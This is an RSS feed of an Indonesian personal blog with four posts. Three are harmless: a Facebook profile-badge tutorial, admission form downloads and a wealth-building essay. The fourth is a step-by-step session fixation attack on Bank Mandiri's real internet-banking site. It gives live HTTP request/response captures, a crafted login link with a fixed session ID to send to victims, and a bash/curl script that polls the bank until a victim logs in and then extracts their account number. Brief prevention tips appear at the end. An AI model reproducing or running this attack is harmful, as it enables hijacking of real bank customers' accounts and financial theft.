<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Adiepseptian&#039;s WebBlog</title>
	<atom:link href="http://adiepseptian.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://adiepseptian.wordpress.com</link>
	<description>Just another WordPress.com weblog</description>
	<lastBuildDate>Thu, 11 Feb 2010 01:42:34 +0000</lastBuildDate>
	<language>id</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='adiepseptian.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Adiepseptian&#039;s WebBlog</title>
		<link>http://adiepseptian.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://adiepseptian.wordpress.com/osd.xml" title="Adiepseptian&#039;s WebBlog" />
	<atom:link rel='hub' href='http://adiepseptian.wordpress.com/?pushpress=hub'/>
		<item>
		<title>CARA MENAMBAHKAN LENCANA PROFIL DI BLOG</title>
		<link>http://adiepseptian.wordpress.com/2010/02/11/cara-menambahkan-lencana-profil-di-blog/</link>
		<comments>http://adiepseptian.wordpress.com/2010/02/11/cara-menambahkan-lencana-profil-di-blog/#comments</comments>
		<pubDate>Thu, 11 Feb 2010 01:42:34 +0000</pubDate>
		<dc:creator>adiepseptian</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://adiepseptian.wordpress.com/?p=53</guid>
		<description><![CDATA[Bosan ma tampilan profile yang disediakan blogger..? klo iya, kebetulan postingan kali ini mungkin bisa jadi salah satu alternatif yang bisa kalian coba biar tampilan profile blognya aga sedikit beda, elegant dan tentunya tampil keren juga. Buat triknya, kali ini sy manfaatin fasilitas dari facebook..dah pada tau kan facebook, yups..situs social networking seperti friendster yang [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=adiepseptian.wordpress.com&amp;blog=9349468&amp;post=53&amp;subd=adiepseptian&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div>Bosan ma tampilan profile yang disediakan blogger..? klo iya, kebetulan postingan kali ini mungkin bisa jadi salah satu alternatif yang bisa kalian coba biar tampilan profile blognya aga sedikit beda, elegant dan tentunya tampil keren juga.</p>
<p>Buat triknya, kali ini sy manfaatin fasilitas dari facebook..dah pada tau kan facebook,<br />
yups..situs social networking seperti friendster yang sekarang banyak digunain orang ternyata bisa kita manfaatin juga untuk menambah atau mempercantik blog kita yaitu dalam mempercantik profil.</p>
<p>Tertarik juga, oke kita langsung aja..<br />
Buat bikinnya..langkah-langkahnya yaitu :</p>
<p>1. Tentunya harus daftar dulu di &#8220;FACEBOOK&#8221;, klo belum daftar sok atuh &#8220;SIGN UP&#8221; dulu..klo udah daftar, mari kita lanjut..he3..</p>
<p>2. Kalian Log in, setelah masuk halaman utama, kalian pilih &#8220;PROFIL&#8221;..lalu lihat di bagian bawah &#8220;TEMAN&#8221; atau &#8220;KIRIMAN&#8221; ada tulisan &#8220;BUAT LENCANA PROFIL&#8221;..kamu klik itu..</p>
<p>3. Selanjutnya, kamu pilih &#8220;BUAT LENCANA BARU&#8221;</p>
<p>Tata cara pengisiannya :</p>
<p>- Tata Letak : bisa kamu pilih..yang tegak atau mendatar<br />
- Format : sebaiknya pulih yang javascript jika ingin dipasang di blog<br />
- Isi : Informasi yang bakalan kamu share di profilenya, klo 3 belum cukup..tinggal tambah ja &#8220;TAMBAH ITEM&#8221;..<br />
- Klo udah oke, lalu pilih &#8220;SIMPAN&#8221;<br />
- Setelah itu nanti kamu bakalan dikasih kodenya, copas kode tersebut ke blog kamu</p>
<p>5. &#8220;MISSION COMPLETE&#8221;</p>
<p>cara masukin ke blognya tinggal pilih &#8220;LAYOUT&#8221; trus&#8221;ADD A GADGET&#8221; lalu pilih &#8220;HTML/Javascript&#8221; trus &#8220;SIMPAN&#8221; dech beres skrng leat hasilnya</p></div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/adiepseptian.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/adiepseptian.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/adiepseptian.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/adiepseptian.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/adiepseptian.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/adiepseptian.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/adiepseptian.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/adiepseptian.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/adiepseptian.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/adiepseptian.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/adiepseptian.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/adiepseptian.wordpress.com/53/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/adiepseptian.wordpress.com/53/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/adiepseptian.wordpress.com/53/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=adiepseptian.wordpress.com&amp;blog=9349468&amp;post=53&amp;subd=adiepseptian&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://adiepseptian.wordpress.com/2010/02/11/cara-menambahkan-lencana-profil-di-blog/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d927bc092f07611747b893b634fab31b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">adiepseptian</media:title>
		</media:content>
	</item>
		<item>
		<title>SELEKSI PENERIMAAN MAHASISWA BARU UNIVERSITAS TRUNOJOYO</title>
		<link>http://adiepseptian.wordpress.com/2010/01/19/seleksi-penerimaan-mahasiswa-baru-universitas-trunojoyo/</link>
		<comments>http://adiepseptian.wordpress.com/2010/01/19/seleksi-penerimaan-mahasiswa-baru-universitas-trunojoyo/#comments</comments>
		<pubDate>Tue, 19 Jan 2010 09:01:34 +0000</pubDate>
		<dc:creator>adiepseptian</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://adiepseptian.wordpress.com/?p=48</guid>
		<description><![CDATA[Saya memohon maaf  jika di posting sebelumnya file .doc nya agak acak-acakan.Namun saat ini sudah saya perbaiki.Anda dapat mendownloadnya melalui link dibawah ini. draft-formulir-bidik-misi-2010 copy-of-draft-formulir-pmb-2010-tanpa-bidik-misi1 NB: Saya menggunakan kertas tipe Legal Selamat Mendownload&#8230;<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=adiepseptian.wordpress.com&amp;blog=9349468&amp;post=48&amp;subd=adiepseptian&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Saya memohon maaf  jika di posting sebelumnya file .doc nya agak acak-acakan.Namun saat ini sudah saya perbaiki.Anda dapat mendownloadnya melalui link dibawah ini.</p>
<p><a href="http://adiepseptian.files.wordpress.com/2010/01/draft-formulir-bidik-misi-20101.doc">draft-formulir-bidik-misi-2010</a></p>
<p><a href="http://adiepseptian.files.wordpress.com/2010/01/copy-of-draft-formulir-pmb-2010-tanpa-bidik-misi13.doc">copy-of-draft-formulir-pmb-2010-tanpa-bidik-misi1</a></p>
<p>NB: Saya menggunakan kertas tipe Legal</p>
<p>Selamat Mendownload&#8230;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/adiepseptian.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/adiepseptian.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/adiepseptian.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/adiepseptian.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/adiepseptian.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/adiepseptian.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/adiepseptian.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/adiepseptian.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/adiepseptian.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/adiepseptian.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/adiepseptian.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/adiepseptian.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/adiepseptian.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/adiepseptian.wordpress.com/48/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=adiepseptian.wordpress.com&amp;blog=9349468&amp;post=48&amp;subd=adiepseptian&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://adiepseptian.wordpress.com/2010/01/19/seleksi-penerimaan-mahasiswa-baru-universitas-trunojoyo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d927bc092f07611747b893b634fab31b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">adiepseptian</media:title>
		</media:content>
	</item>
		<item>
		<title>Hacking Mandiri Internet Banking dengan Session Fixation</title>
		<link>http://adiepseptian.wordpress.com/2010/01/12/24/</link>
		<comments>http://adiepseptian.wordpress.com/2010/01/12/24/#comments</comments>
		<pubDate>Tue, 12 Jan 2010 08:14:58 +0000</pubDate>
		<dc:creator>adiepseptian</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://adiepseptian.wordpress.com/?p=24</guid>
		<description><![CDATA[Dalam artikel ini saya akan menggunakan jurus session fixation untuk membajak session internet banking Mandiri yang merupakan bank terbesar di tanah air. Detil mengenai session fixation attack bisa dibaca di artikel saya sebelumnya yang berjudul mengenal session fixation attack. Session ID Bank Mandiri Internet Banking Internet banking mandiri menggunakan sessionid yang disimpan dalam cookie dengan [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=adiepseptian.wordpress.com&amp;blog=9349468&amp;post=24&amp;subd=adiepseptian&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/02/fixatemandiri2.png"><img class="size-full wp-image-818" title="fixatemandiri2" src="http://www.ilmuhacking.com/wp-content/uploads/2009/02/fixatemandiri2.png" alt="courtesy of bank mandiri" width="198" height="80" /></a>Dalam artikel ini saya akan menggunakan jurus session fixation untuk membajak session internet banking Mandiri yang merupakan bank terbesar di tanah air. Detil mengenai session fixation attack bisa dibaca di artikel saya sebelumnya yang berjudul mengenal <a href="http://www.ilmuhacking.com/web-security/mengenal-session-fixation-attack/" target="_blank">session fixation attack</a>.</p>
<p><strong>Session ID Bank Mandiri Internet Banking</strong></p>
<p>Internet banking mandiri menggunakan sessionid yang disimpan dalam cookie dengan nama JSESSIONID.<strong> </strong>Sessionid ini sangat panjang dan acak, jadi tidak mungkin memakai jurus prediction untuk mendapatkan sessionid. Contoh sessionid bank mandiri adalah:</p>
<div>
<div>
<pre> JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002</pre>
</div>
</div>
<p><strong>Fixate sessionid yang dipilih sendiri dengan query string</strong></p>
<p>Untuk memastikan apakah internet banking mandiri bisa diserang dengan session fixation, saya akan coba memasukkan query string JSESSIONID berisi string yang saya pilih sendiri. Saya coba dengan query string JSESSIONID=01234567890. Berikut adalah request dan response yang terjadi.</p>
<div>
<table>
<tbody>
<tr>
<td>
<pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre>
</td>
<td>
<pre>https://ib.bankmandiri.co.id/retail/Login.do?action=form&amp;JSESSIONID=01234567890
 
GET /retail/Login.do?action=form&amp;JSESSIONID=01234567890 HTTP/1.1
Host: ib.bankmandiri.co.id
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 YFF3 Firefox/3.0.5 ImageShackToolbar/5.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
 
HTTP/1.x 200 OK
Date: Mon, 02 Feb 2009 23:28:58 GMT
Pragma: no-cache
Content-Encoding: gzip
Content-Length: 3822
Content-Type: text/html
Expires: -1
Transfer-Encoding: Chunked
Set-Cookie: JSESSIONID=JHB9fR0rxOD53jgT3h1x57kAmFAqo8s2fp28UZvDxs2zLupl0s1Q!568454685!-1062708981!7668!7002; path=/
Cache-Control: no-cache</pre>
</td>
</tr>
</tbody>
</table>
</div>
<p>Ternyata usulan saya ditolak mentah-mentah oleh server, hal ini terlihat dari responsenya yang memberikan sessionid dalam bentuk cookie pada baris ke-21. Dari response tersebut juga bisa diambil kesimpulan bahwa server bank mandiri lebih suka memakai cookie sehingga bila ada client yang memberikan sessionid dalam query string, dibalas dengan header Set-Cookie. Ini pertanda bagus karena cookie yang diberikan pada korban akan memudahkan serangan saya.</p>
<p><strong>Fixate sessionid yang dibangkitkan server dengan query string</strong></p>
<p>Oke, setelah gagal mengusulkan sessionid sembarangan dengan query string. Saya akan coba lagi dengan sessionid yang dibangkitkan server. Untuk itu sebelumnya saya harus meminta server memberikan sessionid. Dalam contoh ini saya akan gunakan sessionid yang sudah saya minta sebelumnya, yaitu:</p>
<div>
<div>
<pre>JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002</pre>
</div>
</div>
<p>Sessionid ini akan saya kirimkan dalam request dalam bentuk query string. Sebelumnya cookie yang ada harus dihapus karena cookie memiliki prioritas lebih dibanding query string dalam hal sessionid. Berikut request dan response yang terjadi.</p>
<div>
<table>
<tbody>
<tr>
<td>
<pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre>
</td>
<td>
<pre>https://ib.bankmandiri.co.id/retail/Login.do?action=form&amp;JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002
 
GET /retail/Login.do?action=form&amp;JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002 HTTP/1.1
Host: ib.bankmandiri.co.id
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 YFF3 Firefox/3.0.5 ImageShackToolbar/5.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
 
HTTP/1.x 200 OK
Date: Mon, 02 Feb 2009 23:37:42 GMT
Pragma: no-cache
Content-Encoding: gzip
Content-Length: 3824
Content-Type: text/html
Expires: -1
Transfer-Encoding: Chunked
Set-Cookie: JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002; path=/
Cache-Control: no-cache</pre>
</td>
</tr>
</tbody>
</table>
</div>
<p>Hore berhasil. Pada response server ternyata menyetujui untuk memakai sessionid yang saya usulkan melalui query string. Tidak hanya itu, server malah membantu saya dengan membuat cookie dengan isi sessionid usulan saya. Jadi pada request berikutnya saya tidak perlu menambahkan query string karena sudah otomatis cookie terkirimkan. Ini adalah kondisi yang sempurna untuk serangan fixation attack karena serangan bisa dilakukan secara remote dan session cookie akan tercipta otomatis di browser korban.</p>
<p><strong>Skenario Serangan</strong></p>
<p>Skenario serangan menggunakan jurus session fixation pada Mandiri Internet banking ini adalah:</p>
<ol>
<li>Attacker mengirimkan link kepada calon korban.
<ul>
<li>Apakah domainnya benar? Benar! Domain link tersebut ib.bankmandiri.co.id</li>
<li>Apakah pakai https? Benar! URL tersebut diawali dengan https</li>
<li>Apakah pathnya benar? Benar! Path URL tersebut adalah /retail/Login.do</li>
</ul>
</li>
<div>
<div>
<pre>&lt;a target="_blank" href="https://ib.bankmandiri.co.id/retail/Login.do?action=form&amp;JSESSIONID=JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002"&gt;
Klik Dong&lt;/a&gt;</pre>
</div>
</div>
<p lang="justify">Perhatikan link tersebut baik-baik. Link tersebut tidak tampak mencurigakan seperti phishing link. Pengguna yang teliti akan memeriksa link tersebut:</p>
<p>Karena semuanya benar, calon korban akan yakin bahwa itu bukan link phishing berisi fake login page. Padahal sebenarnya link itu mengandung jebakan sessionid fixation. Dan sayangnya tidak pernah ada informasi tentang bahaya ini dari bank yang bersangkutan.</p>
<li>Korban mengklik link tersebut.</li>
<p>Pada saat korban mengklik link tersebut, maka korban telah terjebak menggunakan sessionid yang sudah disiapkan oleh attacker. Pada browser korban akan tercipta sebuah cookie JSESSIONID yang berisi sessionid. Sehingga semua request dari browser korban ke bank mandiri internet banking selalu menggunakan sessionid tersebut.</p>
<p>Untuk coba-coba silakan anda buka link tersebut, kemudian periksa cookie anda. Apakah benar ada cookie berisi sessionid yang isinya sama dengan yang attacker inginkan?</p>
<li>Korban login</li>
<p>Setelah korban membuka halaman login, selanjutnya korban akan memasukkan username dan passwordnya. Bila login sukses, maka korban bisa mengakses accountnya, dan begitu pula attacker karena keduanya berbagi sessionid yang sama.</p>
<li>Attacker mengakses account korban</li>
<p>Karena korban dan attacker menggunakan sessionid yang sama, server menganggap attacker dan korban adalah orang yang sama, yaitu pemegang account yang sah. Nun jauh di sana, attacker selalu memeriksa status session yang sessionidnya diberikan pada korban. Begitu korban berhasil login, pada saat itu juga attacker akan mengakses account korban.</ol>
<p>Bahayanya serangan ini adalah serangan ini bisa memakan banyak korban. Ingat bahwa setelah korban selesai memakai accountnya, dia akan logout. Pada titik ini attacker tidak bisa lagi mengakses account korban. Tapi jangan lupa bahwa cookie berisi sessionid masih ada di browser korban, sehingga setiap kali ada request dari browser itu akan menggunakan sessionid yang sudah ditentukan attacker. Bila ada korban lain memakai browser itu dan login ke mandiri juga, maka orang itu juga akan menjadi korban.</p>
<p><strong>Session Status Checker</strong></p>
<p>Agar session tidak expired, attacker harus melakukan request terus menerus dengan sessionid itu, dengan begini server akan berpikir bahwa sessionid tersebut masih aktif dipakai. Di komputer lain saya telah membuat script sederhana untuk memeriksa status session dengan sessionid tertentu, statusnay apakah “Dead” (tidak ada yang login) atau “Alive” (sedang dipakai orang dan belum logout).</p>
<div>
<table>
<tbody>
<tr>
<td>
<pre>1
2
3
4
5
6
7
8
9
10
11
</pre>
</td>
<td>
<pre>#!/bin/bash
while [ true ] ; do
NOREK=`curl -s "https://ib.bankmandiri.co.id/retail/Welcome.do?action=result" -b kue.txt |grep '&lt;td align="center" height="25" bgcolor="#DDF2FA"&gt;[0-9]*&lt;/td&gt;'|cut -f2 -d"&gt;"|cut -f1 -d"&lt;"`
if [ -z "$NOREK" ]
then
        echo "Dead"
else
        echo "Alive, Norek: $NOREK"
fi
sleep 10
done</pre>
</td>
</tr>
</tbody>
</table>
</div>
<p>Script tersebut memerlukan cookie yang disimpan dalam file kue.txt. File tersebut menyimpan cookie yang akan dikirim pada setiap request. File tersebut mengikuti format dari curl. Agar mudah, sebelumnya saya sengaja meminta cookie dengan curl ke ib.bankmandiri.co.id dan menyimpannya di file kue.txt, kemudian file tersebut saya edit dengan mengganti sessionidnya dengan sessionid yang saya target. Saya memasukkan sessionid yang sama dengan yang saya pakai dalam contoh-contoh sebelumnya di atas, yaitu JHAb6Q3Q1BGE5uCwNMfTDU1yxfxV9vhMODrP0krLdbem8FvqPA7l!568454685!-1062708981!7668!7002</p>
<div id="attachment_800"><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/02/mandirifixate11.png"><img title="mandirifixate11" src="http://www.ilmuhacking.com/wp-content/uploads/2009/02/mandirifixate11-300x192.png" alt="mandiri check session" width="300" height="192" /></a>mandiri check session</p>
</div>
<p>Perhatikan pada gambar di atas, script saya akan looping terus untuk mengirim request dengan cookie berisi sessionid. Bila halaman “/retail/Welcome.do?action=result” berisi “Nomor Rekening”, berarti sessionid tersebut sedang dipakai oleh seseorang.</p>
<p>Perhatikan juga bahwa server bank mandiri tidak peduli dengan fakta bahwa ada 2 request dari ip address dan user agent yang berbeda. Script tersebut dijalankan di Linux dengan IP address yang berbeda dengan request yang dilakukan dari browser korban. Karena request dilakukan dengan curl, maka user agent headernya pun berbeda dengan browser korban. Tapi server tidak peduli dengan semua perbedaan itu, selama request yang datang membawa cookie berisi sessionid yang benar, maka dia berhak mendapatkan akses.</p>
<blockquote><p>Di internet, siapapun yang membawa sessionid anda, akan menjadi anda!</p></blockquote>
<p>Pada gambar tersebut juga terlihat bahwa korban bisa login atau logout berkali-kali, namun tetap menjadi korban attacker. Hal ini terjadi karena cookie berisi sessionid masih tetap ada di browser korban walaupun korban sudah logout. Jadi kalau ada yang login lagi, maka dia juga akan memakai sessionid yang sama.</p>
<p><strong>Modifikasi Cookie Expired Date secara Lokal</strong></p>
<div id="attachment_812"><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/02/fixatemandiri1.png"><img title="fixatemandiri1" src="http://www.ilmuhacking.com/wp-content/uploads/2009/02/fixatemandiri1-300x63.png" alt="modified expired date" width="300" height="63" /></a>modified expired date</p>
</div>
<p>Kelemahan dari serangan remote di atas adalah batas waktu cookie adalah hingga browser ditutup. Begitu browser ditutup, cookie yang expired akan dihapus. Bila attacker memiliki akses fisik, maka akibat serangannya akan semakin dahsyat. Attacker akan memodifikasi tanggal expired session cookie pada browser korban. Tanggal expirednya akan diubah menjadi tahun 2099 misalnya, sehingga cookie tersebut akan tetap ada sampai 2099. Dengan begini semua orang yang login dengan browser itu di komputer itu akan menjadi korban attacker nun jauh di sana yang selalu sabar menanti dengan script session checkernya.</p>
<p><strong>Tips Pencegahan</strong></p>
<p>Sederhana saja cara untuk mencegah agar tidak terkena jebakan batman dari attacker. Sebelum login ke halaman internet banking mandiri, hapus semua cookie yang ada dan query string yang mengandung sessionid. Dengan cara ini sessionid yang dipakai adalah sessionid yang diberi oleh server yang tidak diketahui attacker.</p>
<p><strong>Kesimpulan</strong></p>
<p>Saya telah menunjukkan proof of concept serangan session fixation pada internet banking mandiri. Serangan ini sangat berbahaya karena bisa diserang dari jarak jauh dan korbannya tidak hanya satu orang, tapi semua orang yang login di browser dan komputer yang sama. Sayangnya serangan ini tidak setenar SQL injection atau XSS, padahal serangan ini sama berbahayanya sehingga orang banyak yang tidak aware dengan ancaman ini.</p>
<p>Serangan ini juga tipe serangan yang tidak bisa dicegah dengan https karena serangan ini berada di layer aplikasi. Jadi logic aplikasinya yang harus diperbaiki, bukan pada level protokol https.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/adiepseptian.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/adiepseptian.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/adiepseptian.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/adiepseptian.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/adiepseptian.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/adiepseptian.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/adiepseptian.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/adiepseptian.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/adiepseptian.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/adiepseptian.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/adiepseptian.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/adiepseptian.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/adiepseptian.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/adiepseptian.wordpress.com/24/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=adiepseptian.wordpress.com&amp;blog=9349468&amp;post=24&amp;subd=adiepseptian&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://adiepseptian.wordpress.com/2010/01/12/24/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d927bc092f07611747b893b634fab31b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">adiepseptian</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/02/fixatemandiri2.png" medium="image">
			<media:title type="html">fixatemandiri2</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/02/mandirifixate11-300x192.png" medium="image">
			<media:title type="html">mandirifixate11</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/02/fixatemandiri1-300x63.png" medium="image">
			<media:title type="html">fixatemandiri1</media:title>
		</media:content>
	</item>
		<item>
		<title>BAGAIMANA ORANG KAYA &#8220;MENCIPTAKAN&#8221; UANG</title>
		<link>http://adiepseptian.wordpress.com/2010/01/07/bagaimana-orang-kaya-menciptakan-uang/</link>
		<comments>http://adiepseptian.wordpress.com/2010/01/07/bagaimana-orang-kaya-menciptakan-uang/#comments</comments>
		<pubDate>Thu, 07 Jan 2010 04:56:06 +0000</pubDate>
		<dc:creator>adiepseptian</dc:creator>
				<category><![CDATA[siasat menjadi sukses]]></category>

		<guid isPermaLink="false">http://adiepseptian.wordpress.com/?p=18</guid>
		<description><![CDATA[Sering kita melihat seorang pemilik tempat penggilingan padi di desa-desa adalah orang yang paling kaya di kampung atau bahkan di desa itu.Rumah orang tersebut lebih bagus daripada rumah-rumah disekitarnya.Bahkan dari tahun ke tahun kekayaan orang tersebut semakin bertambah.Apa yang sebenarnya mereka kerjakan??Padahal pekerjaan mereka hanya di tempat penggilingan padi saja.Mereka hanya melihat-lihat saja.Paling tidak mereka [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=adiepseptian.wordpress.com&amp;blog=9349468&amp;post=18&amp;subd=adiepseptian&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Sering kita melihat seorang pemilik tempat penggilingan padi di desa-desa adalah orang yang paling kaya di kampung atau bahkan di desa itu.Rumah orang tersebut lebih bagus daripada rumah-rumah disekitarnya.Bahkan dari tahun ke tahun kekayaan orang tersebut semakin bertambah.Apa yang sebenarnya mereka kerjakan??Padahal pekerjaan mereka hanya di tempat penggilingan padi saja.Mereka hanya melihat-lihat saja.Paling tidak mereka hanya menyuruh karyawannya.Kita bandingkan orang yang mempunyai pekerjaan buruh tani yang biasa dibilang “kasar” dan hanya “setia” melakukan pekejaannya.Orang tersebut rela berkucuran keringat demi mendapatkan sesuap nasi.Sedangkan Penghidupannya dari tahun ke tahun tidak berubah.Bahakan tidak mengalami peningkatan.</p>
<p>Nah,disini saya akan memberikan masukan buat anda yang ingin melakukan sebuah usaha atau mungkin sedang ingin membuka usaha.Dalam hal ini saya ingin memberikan ulasan bagaimana orang “kaya” me-<em>majemen </em>uangnya supaya lebih “kaya”.</p>
<p>untuk lebih jelasnya silahkan anda download file berikut ini :</p>
<p><a href="http://adiepseptian.files.wordpress.com/2010/01/bagaimana-orang-kaya.doc">BAGAIMANA ORANG KAYA &#8220;MENCIPTAKAN&#8221; UANG</a></p>
<p>NB: Terima Kasih buat Pak Yasak Taufan,ST (Direktur Akomnet Bojonegoro) yang sudah “menularkan” ilmunya kepada saya.</p>
